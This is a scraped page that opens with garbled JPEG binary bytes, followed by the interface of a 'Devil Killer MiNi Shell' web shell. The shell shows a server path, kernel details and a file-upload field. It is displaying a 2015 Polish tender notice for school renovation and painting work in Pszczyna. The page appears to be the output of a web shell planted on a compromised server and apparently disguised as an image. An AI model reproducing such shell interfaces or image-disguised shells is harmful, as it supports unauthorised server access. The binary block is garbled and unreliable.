JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150506/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150506/64491-N-2015.html

<p class="kh_header"><b>Pszczyna: Zadanie 1
Remont pomieszczeń w Zespole Szkół nr 1 w Pszczynie przy ul. K.Wielkiego 5

Zadanie 2
Roboty malarskie w Publicznym Gimnazjum nr 1 w Pszczynie przy ul.St.Batorego 24

Zadanie 3
Roboty malarskie w Szkole Podstawowej nr 7 w Ćwiklicach  przy ul. M.Oświęcimskich 71

Zadanie 4
Roboty malarskie w Szkole Podstawowej nr 1 w Pszczynie przy ul. Bogedaina 1</b><br>
<b>Numer ogłoszenia: 64491 - 2015; data zamieszczenia: 06.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pszczyński Zarząd Edukacji , ul. Zdrojowa 4 4, 43-200 Pszczyna, woj. śląskie, tel. 032 2102193 w. 116, faks 032 2102193 w. 118.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie 1
Remont pomieszczeń w Zespole Szkół nr 1 w Pszczynie przy ul. K.Wielkiego 5

Zadanie 2
Roboty malarskie w Publicznym Gimnazjum nr 1 w Pszczynie przy ul.St.Batorego 24

Zadanie 3
Roboty malarskie w Szkole Podstawowej nr 7 w Ćwiklicach  przy ul. M.Oświęcimskich 71

Zadanie 4
Roboty malarskie w Szkole Podstawowej nr 1 w Pszczynie przy ul. Bogedaina 1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zamówienia :
Część I  - Zadanie 1  
Zadanie obejmuje roboty remontowo budowlane w Zespole Szkół Nr 1: 
A. Remont sanitariatów  dziewcząt,  chłopców  i personelu na II piętrze w segmencie II zakresie: -  wymiany urządzeń 
     sanitarnych : muszli na kompakty standard , umywalek i pisuarów, -  wymiany instalacji wodno-kanalizacyjnej 
     wraz z wymianą zaworów i baterii , -  przebudowę odpływów instalacji kanalizacyjnej, -  wymianę płytek 
     ściennych na nowe z wykonaniem tynków cem-wap. kat II  i zabudowaniem luster  nad umywalkami -  malowanie 
     ścian i sufitów farba akrylową z przygotowaniem podłoża i gruntowaniem, -  malowanie rur, -  wymianę  posadzki 
     z gresów na nowe  -  demontaż i ponowny montaż grzejników c.o. z odzysku,  -  wymianę drzwi do kabiny 
     w sanitariatach chłopców, -  malowanie stolarki drzwiowej  , -  wywóz i utylizację gruzu i materiałów 
      pochodzących z rozbiórki  zgodnie z obowiązującymi przepisami prawa
B. Malowanie wybranych pomieszczeń  tj: biblioteki , czytelni  w segmencie III  oraz magazynu sprzętu w segmencie 
     sportowym  w zakresie: - malowania ścian i sufitów farbą emulsyjną akrylową z przygotowaniem  i gruntowaniem 
     podłoża - kolor do uzgodnienia z dyrekcją placówki , - malowania lamperii farbą olejna   w pomieszczeniu 
     biblioteki i czytelni - kolor do uzgodnienia z dyrekcją placówki , - wykonania nowej lamperii w magazynie sprzętu  
     - kolor do uzgodnienia z dyrekcją placówki, - malowanie stolarki drzwiowej , - malowania rur i drobnych 
     elementów metalowych , - malowanie przewodów wentylacyjnych farbą olejną 
C. Montaż  umywalki wraz z podejściami wodno - kanalizacyjnymi  oraz z wykonaniem przy umywalce - fartucha
     z płytek ściennych w magazynie sprzętu w segmencie sportowym.
D. Wymianę wykładziny wraz z remontem podłoża w  bibliotece i czytelni w segmencie III zakresie : - demontażu  
     posadzki z płytek PCW, - wykonania warstwy wyrównawczej z zaprawy samopoziomującej grub. ok. 1,5 cm 
     - ułożenia wykładziny rulonowej obiektowej z wywinięciem na ściany na wysokość ok. 15 cm - kolor do 
     uzgodnienia   z dyrekcja placówki, - montaż listwy aluminiowej -progowej, - wywóz i utylizacje gruzu 
     i materiałów z rozbiórki zgodnie z obowiązującymi przepisami prawa
E. Wymianę opraw oświetleniowych  w pomieszczeniach :  siłowni , sali audio , małej sali gimnastycznej ,  salce 
     korekcyjnej , bibliotece , czytelni , magazynie sprzętu i w sanitariatach  w zakresie: - demontaż opraw ,
     - montażu  nowych opraw świetlówkowych typ TCS125  2x36 W ,  TCS125  2x58 W  (zgodnie z dokumentacją 
     wymiany opraw oświetleniowych  ), - montażu  nowych  opraw -  plafonów  hermetycznych  2x26 W  (zgodnie 
     z dokumentacją  wymiany opraw   oświetleniowych), - wymiany łączników do sterowania oświetleniem
     - wykonanie pomiarów instalacji elektrycznej  z wykonaniem protokołów, - wykonanie pomiarów natężenia 
     oświetlenia z wykonaniem protokołów, - utylizacji  starych opraw oświetleniowych  zgodnie z obowiązującymi 
     przepisami prawa
Szczegółowy zakres zadania został określony w  przedmiarze robót , specyfikacji technicznej wykonania i odbioru robót budowlanych  oraz dokumentacji technicznej wymiany opraw oświetleniowych .

Zadanie 2
Zadanie obejmuje   malowanie wybranych pomieszczeń  tj:  sal nr 7, 6, 5, 2, 2A, 1A , pokoju nauczycielskiego , szatni przy stołówce i sanitariatów personelu przy szatni    w Publicznym Gimnazjum nr 1 w Pszczynie   w zakresie :
- malowania ścian i sufitów farbą emulsyjną akrylową z przygotowaniem i gruntowaniem podłoża  - kolor do 
  uzgodnienia z dyrekcją placówki  - malowania lamperii farbą olejną - kolor do uzgodnienia z dyrekcją placówki 
- malowania rur i drobnych elementów metalowych , - lakierowania stolarki drzwiowej 
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych .
Zadanie 3
Zadanie obejmuje  malowanie wybranych pomieszczeń  tj:   szatni przedszkola , zaplecza sali gimnastycznej , korytarza w łączniku  w Szkole Podstawowej nr 7 w Ćwiklicach w zakresie : - malowania ścian i sufitów farbą emulsyjną akrylową z przygotowaniem i gruntowaniem podłoża  - kolor do  uzgodnienia z dyrekcją placówki ,
- malowania lamperii farbą olejną - kolor do uzgodnienia z dyrekcją placówki , - malowania rur , grzejników  
i drobnych elementów metalowych , - lakierowania stolarki drzwiowej 
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych .
Zadanie 4 
Zadanie obejmuje  malowanie wybranych pomieszczeń  tj:   sal lekcyjnych na II piętrze oraz gabinetu pedagoga 
 w Szkole Podstawowej nr 1 w Pszczynie w zakresie : - malowania ścian i sufitów farbą emulsyjną akrylową 
z przygotowaniem i gruntowaniem podłoża  - kolor do  uzgodnienia z dyrekcją placówki , - malowania lamperii farbą olejną - kolor do uzgodnienia z dyrekcją placówki  - malowania rur , grzejników  i drobnych elementów metalowych 
- lakierowania stolarki drzwiowej , - malowanie cokolików drewnianych 
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>zgodnie z art. 67 ust. 1 pkt 6 Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.31.00-7, 45.33.00.00-9, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium  w wysokości :   
      Zadanie 1   -     2 400,00  zł.  ( słownie : dwa tysiące czterysta złotych )
      Zadanie 2   -        300,00  zł.  ( słownie : trzysta  złotych )
      Zadanie 3   -        300,00  zł.  ( słownie : trzysta  złotych)
      Zadanie 4  -          600,00 zł.  ( słownie : sześćset złotych
 należy wnieść w terminie   22.05.2015 r.  do godz. 11:00 przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełni a</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. oświadczenie wykonawcy , że  nie zalega z opłacaniem podatków, opłat oraz  składek na ubezpieczenie zdrowotne 
       i społeczne,</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - gwarancja na roboty i materiały 1 pkt. za 3 lata, 5 pkt. za 4 lata , 10 pkt. za 5 lat - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany postanowień umowy.
1.  Zamawiający przewiduje zmiany umowy w przypadkach: 
1.1	zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy,
1.2	wystąpienia urzędowej zmiany stawki podatku VAT zaistniałej po dacie zawarcia umowy,
1.3	niezależnych od stron umowy zmian organizacyjnych dotyczących osób kluczowych dla realizacji umowy 
(w szczególności choroby, wypadku losowego, nieprzewidzianej  zmiany   organizacyjnej).
1.4	zmiana podwykonawcy robót w trakcie realizacji umowy za zgodą Zamawiającego
2.  Zmiana postanowień umowy z uwagi na wystąpienie powyższych lub innych okoliczności  niezależnych  od 
     Wykonawcy, może    nastąpić pod warunkiem wyrażenia zgody przez Zamawiającego.  .
3.  Wszelkie zmiany uzupełnienia niniejszej umowy wymagają zachowania formy pisemnej w postaci  aneksu do    
     umowy  podpisanego   przez obie strony pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pze.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pszczyński Zarząd Edukacji
43-200 Pszczyna, ul. Zdrojowa 4 (woj. śląskie)
tel. (32) 210 21 93   wew.115    fax. wew. 118
pokój nr 115.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2015 godzina 11:00, miejsce: Pszczyński Zarząd Edukacji
43-200 Pszczyna, ul. Zdrojowa 4 (woj. śląskie)
tel. (32) 210 21 93   wew.115    fax. wew. 118
pokój nr  103.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1
Remont pomieszczeń w Zespole Szkół nr 1 w Pszczynie przy ul. K.Wielkiego 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I  - Zadanie 1  
Zadanie obejmuje roboty remontowo budowlane w Zespole Szkół Nr 1: 
A. Remont sanitariatów  dziewcząt,  chłopców  i personelu na II piętrze w segmencie II zakresie: -  wymiany urządzeń 
     sanitarnych : muszli na kompakty standard , umywalek i pisuarów, -  wymiany instalacji wodno-kanalizacyjnej 
     wraz z wymianą zaworów i baterii , -  przebudowę odpływów instalacji kanalizacyjnej, -  wymianę płytek 
     ściennych na nowe z wykonaniem tynków cem-wap. kat II  i zabudowaniem luster  nad umywalkami -  malowanie 
     ścian i sufitów farba akrylową z przygotowaniem podłoża i gruntowaniem, -  malowanie rur, -  wymianę  posadzki 
     z gresów na nowe  -  demontaż i ponowny montaż grzejników c.o. z odzysku,  -  wymianę drzwi do kabiny 
     w sanitariatach chłopców, -  malowanie stolarki drzwiowej  , -  wywóz i utylizację gruzu i materiałów 
      pochodzących z rozbiórki  zgodnie z obowiązującymi przepisami prawa
B. Malowanie wybranych pomieszczeń  tj: biblioteki , czytelni  w segmencie III  oraz magazynu sprzętu w segmencie 
     sportowym  w zakresie: - malowania ścian i sufitów farbą emulsyjną akrylową z przygotowaniem  i gruntowaniem 
     podłoża - kolor do uzgodnienia z dyrekcją placówki , - malowania lamperii farbą olejna   w pomieszczeniu 
     biblioteki i czytelni - kolor do uzgodnienia z dyrekcją placówki , - wykonania nowej lamperii w magazynie sprzętu  
     - kolor do uzgodnienia z dyrekcją placówki, - malowanie stolarki drzwiowej , - malowania rur i drobnych 
     elementów metalowych , - malowanie przewodów wentylacyjnych farbą olejną 
C. Montaż  umywalki wraz z podejściami wodno - kanalizacyjnymi  oraz z wykonaniem przy umywalce - fartucha
     z płytek ściennych w magazynie sprzętu w segmencie sportowym.
D. Wymianę wykładziny wraz z remontem podłoża w  bibliotece i czytelni w segmencie III zakresie : - demontażu  
     posadzki z płytek PCW, - wykonania warstwy wyrównawczej z zaprawy samopoziomującej grub. ok. 1,5 cm 
     - ułożenia wykładziny rulonowej obiektowej z wywinięciem na ściany na wysokość ok. 15 cm - kolor do 
     uzgodnienia   z dyrekcja placówki, - montaż listwy aluminiowej -progowej, - wywóz i utylizacje gruzu 
     i materiałów z rozbiórki zgodnie z obowiązującymi przepisami prawa
E. Wymianę opraw oświetleniowych  w pomieszczeniach :  siłowni , sali audio , małej sali gimnastycznej ,  salce 
     korekcyjnej , bibliotece , czytelni , magazynie sprzętu i w sanitariatach  w zakresie: - demontaż opraw ,
     - montażu  nowych opraw świetlówkowych typ TCS125  2x36 W ,  TCS125  2x58 W  (zgodnie z dokumentacją 
     wymiany opraw oświetleniowych  ), - montażu  nowych  opraw -  plafonów  hermetycznych  2x26 W  (zgodnie 
     z dokumentacją  wymiany opraw   oświetleniowych), - wymiany łączników do sterowania oświetleniem
     - wykonanie pomiarów instalacji elektrycznej  z wykonaniem protokołów, - wykonanie pomiarów natężenia 
     oświetlenia z wykonaniem protokołów, - utylizacji  starych opraw oświetleniowych  zgodnie z obowiązującymi 
     przepisami prawa
Szczegółowy zakres zadania został określony w  przedmiarze robót , specyfikacji technicznej wykonania i odbioru robót budowlanych  oraz dokumentacji technicznej wymiany opraw oświetleniowych ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.31.00-7, 45.31.00.00-3, 45.33.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancja na roboty i materiały 1 pkt. za 3 lata , 5 pkt. za 4 lata, 10 pkt. za 5 lat - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2
Roboty malarskie w Publicznym Gimnazjum nr 1 w Pszczynie przy ul.St.Batorego 24.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2
Zadanie obejmuje   malowanie wybranych pomieszczeń  tj:  sal nr 7, 6, 5, 2, 2A, 1A , pokoju nauczycielskiego , szatni przy stołówce i sanitariatów personelu przy szatni    w Publicznym Gimnazjum nr 1 w Pszczynie   w zakresie :
- malowania ścian i sufitów farbą emulsyjną akrylową z przygotowaniem i gruntowaniem podłoża  - kolor do 
  uzgodnienia z dyrekcją placówki  - malowania lamperii farbą olejną - kolor do uzgodnienia z dyrekcją placówki 
- malowania rur i drobnych elementów metalowych , - lakierowania stolarki drzwiowej 
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.31.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancja na roboty i materiały 1 pkt. za 3 lata , 5 pkt. za 4 lata, 10 pkt. za 5 lat - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3
Roboty malarskie w Szkole Podstawowej nr 7 w Ćwiklicach  przy ul. M.Oświęcimskich 71.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 3
Zadanie obejmuje  malowanie wybranych pomieszczeń  tj:   szatni przedszkola , zaplecza sali gimnastycznej , korytarza w łączniku  w Szkole Podstawowej nr 7 w Ćwiklicach w zakresie : - malowania ścian i sufitów farbą emulsyjną akrylową z przygotowaniem i gruntowaniem podłoża  - kolor do  uzgodnienia z dyrekcją placówki ,
- malowania lamperii farbą olejną - kolor do uzgodnienia z dyrekcją placówki , - malowania rur , grzejników  
i drobnych elementów metalowych , - lakierowania stolarki drzwiowej 
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.31.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancja na roboty i materiały :  1pkt. za 3 lata , 5 pkt. za 4 lata, 10 pkt. za 5 lat. - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4
Roboty malarskie w Szkole Podstawowej nr 1 w Pszczynie przy ul. Bogedaina 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 4 
Zadanie obejmuje  malowanie wybranych pomieszczeń  tj:   sal lekcyjnych na II piętrze oraz gabinetu pedagoga 
 w Szkole Podstawowej nr 1 w Pszczynie w zakresie : - malowania ścian i sufitów farbą emulsyjną akrylową 
z przygotowaniem i gruntowaniem podłoża  - kolor do  uzgodnienia z dyrekcją placówki , - malowania lamperii farbą olejną - kolor do uzgodnienia z dyrekcją placówki  - malowania rur , grzejników  i drobnych elementów metalowych 
- lakierowania stolarki drzwiowej , - malowanie cokolików drewnianych 
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.31.00-7.</p></li>
